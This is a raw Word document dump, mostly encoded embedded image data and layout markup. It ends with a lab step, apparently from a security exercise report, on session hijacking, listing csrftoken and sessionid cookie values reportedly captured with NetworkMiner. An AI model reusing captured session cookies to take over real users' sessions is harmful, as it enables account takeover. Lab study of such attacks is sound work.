N+JpNCu57TxBHI9nbwXvmfZ5PMuJLj/WRxxy&#10;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eMU0ffwDAADxCwAADgAAAAAAAAAAAAAAAAA9AgAAZHJz&#10;L2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAiJ0j64tOAQCLTgEAFAAAAAAAAAAAAAAAAABlBgAA&#10;ZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAUAAYACAAAACEAWEcUn90AAAAFAQAADwAAAAAAAAAA&#10;AAAAAAAiVQEAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhADedwRi6AAAAIQEAABkAAAAA&#10;AAAAAAAAAAAALFYBAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAHVcB&#10;AAAA&#10;">
                <v:rect id="Rectangle 3168" o:spid="_x0000_s1248" style="position:absolute;left:59448;top:32362;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560A0F8F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3169" o:spid="_x0000_s1249" style="position:absolute;top:34008;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3A861905" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3188" o:spid="_x0000_s1250"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8wQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LS8NA&#10;EL4L/odlBG920wqlxG6LFKT1YOlD70N2TBazMzE7tvHfdw+FHj++93w5xNacqE9B2MF4VIAhrsQH&#10;rh18Ht+eZmCSIntshcnBPyVYLu7v5lh6OfOeTgetTQ7hVKKDRrUrrU1VQxHTSDrizH1LH1Ez7Gvr&#10;ezzn8NjaSVFMbcTAuaHBjlYNVT+Hv+hggtvgd/K1e1/90vrDDipB1LnHh+H1BYzSoDfx1b3xDp7H&#10;szw3v8lPwC4uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOmRwfzBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;">
                  <v:imagedata r:id="rId78" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3189" o:spid="_x0000_s1251"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sZNxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8aVoV6XaNsugqHv2zIN4ezbMtNi+lydr67Y0geBxm5jfMbNGZStyocaVlBfEwAkGc&#10;WV1yruDvuB4kIJxH1lhZJgV3crCYf/RmmGrb8p5uB5+LAGGXooLC+zqV0mUFGXRDWxMH72Ibgz7I&#10;Jpe6wTbATSVHUTSVBksOCwXWtCwoux7+jYLfdnTy593mmsQXq+tJvuLx7qhU/7P7+QbhqfPv8Ku9&#10;1QrGcfIFzzfhCcj5AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADwexk3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF747A4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="869" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> For session hijacking we need session id So copy the session id These are the credentials we got from network miner:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>csrftoken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">=VEWEf4iJL3WMcJ3tBOTy6bV3hO4X8ZDz; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488420E4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="98" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAffinity=e61eeacfb9a4538c3dd42ace45dcab4656f932e6e6ebe448c81386615ae5113e; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sessionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">=iapc96gabmddg07p20n2awnvkfe0q0az </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE9B28" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
